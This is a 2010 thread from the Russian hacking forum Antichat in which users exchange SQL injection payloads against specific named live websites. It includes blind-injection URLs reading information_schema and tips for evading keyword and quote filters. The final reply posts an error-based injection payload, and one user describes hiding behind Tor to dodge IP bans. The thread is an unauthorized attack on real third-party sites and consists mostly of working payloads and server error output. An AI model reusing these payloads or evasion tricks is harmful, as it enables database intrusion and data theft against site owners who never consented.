HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.03.2010, 04:06
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

http://www.gtbit.org/news/viewitem.php?id=37

ещё в чём фишка:
если так
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+table_name+from+information_schema.tables),1,1))=53
то страница Not Acceptable
а если
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+123+from+123),1,1))=53
то Internal Server Error

Довольно странно, получается что запрос выполняется

Последний раз редактировалось Seravin; 10.03.2010 в 04:19..
 
Ответить с цитированием

  #2  
Старый 10.03.2010, 04:31
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

оно там еще по ip банит, сцуко
 
Ответить с цитированием

  #3  
Старый 10.03.2010, 04:37
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода
PHP код:
$id=$_GET['id'];
$id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
if (strstr('from',$id)>0showerror
как такое обойти?
 
Ответить с цитированием

  #4  
Старый 10.03.2010, 09:44
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Seravin  
есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода
PHP код:
$id=$_GET['id'];
$id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
if (strstr('from',$id)>0showerror
как такое обойти?
PHP ))

id=123456768+union+select+1+--+
12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение.
 
Ответить с цитированием

  #5  
Старый 10.03.2010, 12:02
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от Ctacok  
PHP ))

id=123456768+union+select+1+--+
12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение.
Что-то ты какую-то хрень непонятную написал)
У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?
 
Ответить с цитированием

  #6  
Старый 10.03.2010, 12:43
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Seravin  
Что-то ты какую-то хрень непонятную написал)
У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?
Не о том подумал =\
Я думал про фильтрацию числе.

Ну если на union, можно как слепую.
 
Ответить с цитированием

  #7  
Старый 10.03.2010, 12:49
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от Ctacok  
Не о том подумал =\
Я думал про фильтрацию числе.

Ну если на union, можно как слепую.
ну это понятно, но тут второй косяк: фильтрация на from ещё...
 
Ответить с цитированием

  #8  
Старый 10.03.2010, 08:09
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

карочи я вообще задолбался раскрутит эту скул:
Цитата:
http://www.bourdela.tv/index.php?topic=2'
никак не могу обходит фильтр кавычки, всё перепробовал
Цитата:
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?topic=2'' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
может кто посоветует обход
 
Ответить с цитированием

  #9  
Старый 10.03.2010, 16:29
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от YuNi|[c  
карочи я вообще задолбался раскрутит эту скул:


никак не могу обходит фильтр кавычки, всё перепробовал

может кто посоветует обход
Цитата:
http://www.bourdela.tv/index.php?topic=2')and(1=1)--+
тоже одинаковый результат
 
Ответить с цитированием

  #10  
Старый 10.03.2010, 17:48
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

YuNi|[c,
Цитата:
http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.